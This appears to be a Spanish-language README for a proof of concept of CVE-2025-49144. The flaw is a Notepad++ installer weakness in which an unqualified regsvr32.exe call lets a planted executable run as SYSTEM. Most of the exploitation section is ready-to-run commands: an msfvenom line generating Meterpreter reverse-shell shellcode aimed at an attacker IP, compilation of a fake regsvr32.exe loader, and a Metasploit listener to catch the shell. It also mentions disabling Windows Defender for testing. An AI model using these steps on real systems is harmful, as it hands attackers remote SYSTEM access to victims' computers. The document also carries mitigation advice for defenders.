
CVE-2025-49144 PoC para que investigadores de seguridad prueben y experimenten.

📌 CVE-2025-49144 es una vulnerabilidad de escalada de privilegios local de alta gravedad encontrada en los instaladores de Notepad++ v8.8.1 y versiones anteriores. Esta vulnerabilidad se origina por un comportamiento no controlado de la ruta de búsqueda de ejecutables durante la instalación, permitiendo a un atacante local obtener privilegios de nivel SYSTEM colocando ejecutables maliciosos en el mismo directorio que el instalador.
⚙️ Cómo funciona el CVE – Paso a paso:
🧱 1. ¿Qué salió mal en el instalador?
El instalador de Notepad++ (anterior a v8.8.2) llama a regsvr32.exe para registrar algunos componentes, pero lo hace sin proporcionar la ruta completa (como C:\Windows\System32\regsvr32.exe).
En su lugar, simplemente ejecuta:
regsvr32.exe some_dll
📂 2. Comportamiento de la ruta de búsqueda de Windows: Cuando se ejecuta un ejecutable sin una ruta completa, Windows utiliza un orden de búsqueda específico para encontrar el archivo:
La carpeta desde la cual se lanzó la aplicación (por ejemplo, Descargas)
La carpeta del sistema (System32)
La carpeta de Windows
El directorio de trabajo actual
Rutas en la variable de entorno PATH
Por lo tanto, si se coloca un regsvr32.exe falso en la misma carpeta que el instalador (por ejemplo, Descargas), Windows lo usará antes que el real.
💣 3. Explotación:
- El atacante coloca un regsvr32.exe malicioso en la misma carpeta que el instalador legítimo de Notepad++ (por ejemplo, la carpeta de Descargas de la víctima).
- La víctima ejecuta el instalador (pensando que es seguro).
- El instalador llama a regsvr32.exe, pero termina ejecutando el malicioso desde la misma carpeta, con privilegios SYSTEM (porque los instaladores normalmente solicitan permisos de administrador).
- La carga útil del atacante ahora se ejecuta como NT AUTHORITY\SYSTEM.
⚙️ Pasos para reproducir:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your-ip> LPORT=4444 -f c > shellcode.txt
x86_64-w64-mingw32-gcc regsvr32_loader.c -o regsvr32.exe -mwindows
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST X.X.X.X
set LPORT 4444
run
Nota: Esto es un PoC, por lo tanto se probó con Windows Defender y la protección en tiempo real desactivada.
✅ Mitigación
Los usuarios y administradores deben:
Actualizar a Notepad++ v8.8.2 o posterior
Restringir la instalación de software a administradores de confianza
Usar AppLocker, WDAC o Políticas de Restricción de Software (SRP) para:
Los equipos de seguridad deben auditar regularmente las rutas de instalación, monitorear los permisos de escritura y observar el comportamiento durante la ejecución del instalador para reducir la superficie de ataque.
Licencia MIT — Gratuito solo con fines educativos, de investigación y defensivos.
Las solicitudes de extracción son bienvenidas: mejora la detección, añade funciones o sugiere correcciones.
Este PoC es solo con fines educativos y de investigación. Úselo bajo su propio riesgo. El autor no se hace responsable de ningún uso indebido o daño causado.